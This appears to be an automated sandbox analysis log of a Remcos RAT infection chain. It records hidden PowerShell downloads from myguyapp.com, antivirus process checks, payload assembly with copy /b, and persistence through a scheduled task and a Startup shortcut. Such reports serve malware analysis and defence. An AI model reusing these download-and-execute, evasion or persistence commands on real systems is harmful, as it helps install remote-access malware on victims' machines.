Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_00BD0F91

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

38_2_00C11B4D

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00BB338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

38_2_00BB338B

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C1BBED SendInput,keybd_event,

38_2_00C1BBED

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C1ECD0 mouse_event,

38_2_00C1ECD0

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C114AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

38_2_00C114AE

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C11FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

38_2_00C11FB0

Source: Propose.com, 0000001E.00000003.2067358463.0000000004575000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.2060559545.00000000003A3000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000000.2077694198.0000000000C73000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: LinkHub.com	Binary or memory string: Shell_TrayWnd
Source: logs.dat.30.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00BD0A08 cpuid

38_2_00BD0A08

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C0E5F4 GetLocalTime,

38_2_00C0E5F4

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C0E652 GetUserNameW,

38_2_00C0E652

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00BEBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

38_2_00BEBCD2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

15_2_00406805

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: LinkHub.com	Binary or memory string: WIN_81
Source: LinkHub.com	Binary or memory string: WIN_XP
Source: LinkHub.com, 00000028.00000000.2192810332.0000000000C73000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: LinkHub.com	Binary or memory string: WIN_XPe
Source: LinkHub.com	Binary or memory string: WIN_VISTA
Source: LinkHub.com	Binary or memory string: WIN_7
Source: LinkHub.com	Binary or memory string: WIN_8

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3QMI88

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C32263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		38_2_00C32263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C31C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		38_2_00C31C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
